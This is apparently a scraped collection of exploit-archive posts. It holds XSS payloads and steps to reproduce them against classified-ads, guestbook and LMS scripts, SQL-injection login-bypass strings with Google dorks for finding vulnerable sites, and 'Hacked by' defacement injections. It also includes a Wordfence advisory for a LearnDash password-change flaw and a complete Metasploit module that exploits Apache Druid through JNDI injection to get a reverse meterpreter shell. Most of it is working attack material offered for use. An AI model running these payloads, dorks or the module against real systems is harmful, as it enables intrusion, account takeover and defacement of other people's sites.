<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/classified-ads-script-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : Classified Ads Script 1.8 │<br />│ Vuln Type: Reflected XSS - Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Reflected XSS │<br />│ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />│ │<br />│ Stored XSS │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />GET 'p' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?id=14&cat_id=0&p=reioh%22%3e%3cscript%3ealert(1)%3c%2fscript%3eiv1mz&search=<br /><br /><br />Path: /<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/x5t6p"><script>alert(1)</script>w5omd?id=14&cat_id=0&p=&search=<br /><br /><br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /classified-ads-script-php/classifiedscript/user.php HTTP/2<br /><br />Content-Disposition: form-data; name="title"<br /><br /><script>alert(1)</script><br />-----------------------------------------------<br /><br />POST parameter 'title' is vulnerable to XSS<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Normal User] Click on [Create Classified Ad] to create a [New Ads] on this Path (https://website/user.php?act=newAds)<br />2. Inject your [XSS Payload] in "Enter Title"<br />3. Save<br />4. XSS Fired on Local User Browser<br /><br />5. When ADMIN check [Classified Ads Entry List] in Administration Panel to check [Waiting Approval Ads] on this Path (https://website/admin.php?act=ads)<br />6. XSS Will Fire and Executed on his Browser <br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://simplephpscripts.com/guestbook-script-php/ │<br />│ Vendor : SimplePHPscripts │<br />│ Software : GuestBook Script 2.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=new<br /><br /><br />Path: /preview.php<br /><br />GET 'SysMessage' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | <br />| # Vendor : http://alumnimagnet.com | <br />| # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload user : 'or''='@gmail.com pass : 'or''='<br /><br />[+] https://127.0.0.1/edu/admin.html<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ALTISA CMS 5.2.1 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : http://altisadz.com/ | <br />| # Dork : Projet de gestion de SUPPLY CHAIN |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : User & Pass : ADMIN' OR 1=1#<br /><br />[+] Panel http://127.0.0.1/altisadzcom/admin<br /><br /><br />====Greetings to :=======================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Advanced Testimonials Manager v4.1.1 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194 | <br />| # Dork : Advanced Testimonial Manager |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & pass = ' or 1=1 limit 1 -- -+<br /><br />[+] http://127.0.0.1/www/lizaspartyrentalcom/testimonials/admin/index.php<br /><br />====Greetings to :=======================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Advanced Php Url Shortener v 1.0 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.dl.persianscript.ir/script/advanced-php-url-shortener(PersianScript.ir).rar | <br />| # Dork : |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] HTML Inject :<br /><br />[+] use payload : =%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />[+] http://127.0.0.1/social.pricopinfo/index.php?a=discover&u=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />XSS :<br /><br />[+] use payload : index.php?a=discover&u=skylargrey%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%28966118%29%22%3E<br /><br />[+] http://127.0.0.4/social.pricopinfo//index.php?a=discover&u=skylargrey%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%28966118%29%22%3E<br /><br />====Greetings to :=======================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v 1.6 HTML inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://activeitzone.com/demo/matrimonial_v1.6/ | <br />| # Dork : "Active Matrimonial CMS - All Rights Reserved " |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new member .<br /><br />[+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/matrimonial_v1.6/home/profile<br /><br />[+] in Introduction box , put your code or use this code for test :<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/rocketsoft │<br />│ Vendor : RocketSoft │<br />│ Software : Rocket LMS 1.7 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />------------------------------------------------------------<br />POST /contact/store HTTP/1.1<br /><br /><br />_token=iytfhBpLDYy2flCFdMGcnYGIyvONBDgK60DdwAtn&name=[XSS Payload]&email=cracker@infosec.com&phone=96171951951&subject=[XSS Payload]&message=[XSS Payload]&captcha=32499<br />------------------------------------------------------------<br /><br />POST parameter 'name' is vulnerable to XSS<br />POST parameter 'subject' is vulnerable to XSS<br />POST parameter 'message' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login (as Student) "Normal User"<br />2. Click On [Contact US] on this Path (https://website/contact)<br />3. Inject your [XSS Payload] in "Your name"<br />4. Inject your [XSS Payload] in "Subject"<br />5. Inject your [XSS Payload] in "Message Box"<br />6. Click on [Send Message]<br /><br /><br />5. When ADMIN Visit the [Notifications] - [History] in administration Panel to Check new messages on this Path (https://website/admin/notifications) & Click on [Show]<br />6. XSS will Fire & Executed on his Browser<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Description: LearnDash LMS <= 4.6.0 – Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change <br /><br />Affected Plugin: LearnDash LMS<br /><br />Plugin Slug: sfwd-lms<br /><br />Affected Versions: <= 4.6.0<br /><br />CVE ID: CVE-2023-3105<br /><br />CVSS Score: 8.8 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 4.6.0.1<br /><br />The LearnDash LMS plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for attackers with existing account access at any level, to change user passwords and potentially take over administrator accounts.<br /><br />Technical Analysis<br /><br />The LearnDash LMS plugin provides the shortcode ‘[ld_reset_password]‘ to embed a password reset form into a page on a WordPress site. The form allows users to submit their username or email address to receive an email with a password reset link containing a user activation key.<br /><br />Examining the code reveals that the plugin checks that the user activation key belongs to the given user with the learndash_reset_password_verification() function only when displaying the new password form, where the new password can be entered.<br /><br />[View this code snippet on the blog] <br /><br />However, there is no user activation key check when processing this form. This makes it possible for any authenticated user who has accessed the password reset form via the link sent in the email to modify the password of another user by changing the value of the username hidden input field.<br /><br />[View this code snippet on the blog] <br /><br />As with any Arbitrary User Password Change that leads to a Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.<br /><br />Disclosure Timeline<br /><br />June 5, 2023 – Discovery of the Arbitrary User Password Change vulnerability in LearnDash LMS.<br /><br />June 5, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />June 5, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />June 5, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />June 5, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />June 6, 2023 – A fully patched version of the plugin, 4.6.0.1, is released.<br /><br />July 5, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we have detailed an Arbitrary User Password Change vulnerability within the LearnDash LMS plugin affecting versions 4.6.0 and earlier. This vulnerability allows threat actors to easily take over websites by resetting the password of any user, including administrators. The vulnerability has been fully addressed in version 4.6.0.1 of the plugin. We encourage WordPress users to verify that their sites are updated to the latest patched version of LearnDash LMS.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 5, 2023. Sites still using the free version of Wordfence will receive the same protection on July 5, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Retry<br /> include Msf::Exploit::Remote::JndiInjection<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(_info = {})<br /> super(<br /> 'Name' => 'Apache Druid JNDI Injection RCE',<br /> 'Description' => %q{<br /><br /> This module is designed to exploit the JNDI injection vulnerability<br /> in Druid. The vulnerability specifically affects the indexer/v1/sampler<br /> interface of Druid, enabling an attacker to execute arbitrary commands<br /> on the targeted server.<br /><br /> The vulnerability is found in Apache Kafka clients versions ranging from<br /> 2.3.0 to 3.3.2. If an attacker can manipulate the sasl.jaas.config<br /> property of any of the connector's Kafka clients to com.sun.security.auth.module.JndiLoginModule,<br /> it allows the server to establish a connection with the attacker's LDAP server<br /> and deserialize the LDAP response. This provides the attacker with the capability<br /> to execute java deserialization gadget chains on the Kafka connect server,<br /> potentially leading to unrestricted deserialization of untrusted data or even<br /> remote code execution (RCE) if there are relevant gadgets in the classpath.<br /><br /> To facilitate the exploitation process, this module will initiate an LDAP server<br /> that the target server needs to connect to in order to carry out the attack.<br /> },<br /> 'Author' => [<br /> 'RedWay Security <info[at]redwaysecurity.com>', # Metasploit module<br /> 'Jari Jääskelä <https://github.com/jarijaas>' # discovery<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2023-25194' ],<br /> [ 'URL', 'https://hackerone.com/reports/1529790'],<br /> [ 'URL', 'https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz' ]<br /> ],<br /> 'DisclosureDate' => '2023-02-07',<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8888,<br /> 'SSL' => true,<br /> 'SRVPORT' => 3389,<br /> 'WfsDelay' => 30<br /> },<br /> 'Targets' => [<br /> [<br /> 'Windows', {<br /> 'Platform' => 'win'<br /> },<br /> ],<br /> [<br /> 'Linux', {<br /> 'Platform' => 'unix',<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp'<br /> }<br /> },<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> validate_configuration!<br /><br /> vprint_status('Attempting to trigger the jndi callback...')<br /><br /> start_service<br /> res = trigger<br /> return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?<br /><br /> retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received }<br /><br /> return Exploit::CheckCode::Unknown('No LDAP search query was received.') unless @search_received<br /><br /> report_vuln({<br /> host: rhost,<br /> port: rport,<br /> name: name.to_s,<br /> refs: references,<br /> info: "Module #{fullname} found vulnerable host."<br /> })<br /><br /> Exploit::CheckCode::Vulnerable<br /> ensure<br /> cleanup_service<br /> end<br /><br /> def build_ldap_search_response_payload<br /> return [] if @search_received<br /><br /> @search_received = true<br /><br /> return [] unless @exploiting<br /><br /> print_good('Delivering the serialized Java object to execute the payload...')<br /> build_ldap_search_response_payload_inline('CommonsBeanutils1')<br /> end<br /><br /> def trigger<br /> data = {<br /> type: 'kafka',<br /> spec: {<br /> type: 'kafka',<br /> ioConfig: {<br /> type: 'kafka',<br /> consumerProperties: {<br /> "bootstrap.servers": "#{Faker::Internet.ip_v4_address}:#{Faker::Number.number(digits: 4)}",<br /> "sasl.mechanism": 'SCRAM-SHA-256',<br /> "security.protocol": 'SASL_SSL',<br /> "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"#{Rex::Text.rand_text_alphanumeric(5)}\" debug=\"true\" group.provider.url=\"#{Rex::Text.rand_text_alphanumeric(5)}\";"<br /> },<br /> topic: Rex::Text.rand_text_alpha(8..12).to_s,<br /> useEarliestOffset: true,<br /> inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: (SecureRandom.uuid.gsub('-', '')[0..20]).to_s, columns: ['raw'] }<br /> },<br /> dataSchema: { dataSource: Rex::Text.rand_text_alphanumeric(5..10).to_s, timestampSpec: { column: Rex::Text.rand_text_alphanumeric(5..10).to_s, missingValue: DateTime.now.utc.iso8601.to_s }, dimensionsSpec: {}, granularitySpec: { rollup: false } },<br /> tuningConfig: { type: 'kafka' }<br /> },<br /> samplerConfig: { numRows: 500, timeoutMs: 15000 }<br /> }<br /><br /> @search_received = false<br /><br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri, '/druid/indexer/v1/sampler') + '?for=connect',<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => data.to_json<br /> )<br /> end<br /><br /> def exploit<br /> validate_configuration!<br /> @exploiting = true<br /> start_service<br /> res = trigger<br /> fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 400<br /><br /> retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received && (!handler_enabled? || session_created?) }<br /> handler<br /> ensure<br /> cleanup<br /> end<br />end<br /></code></pre>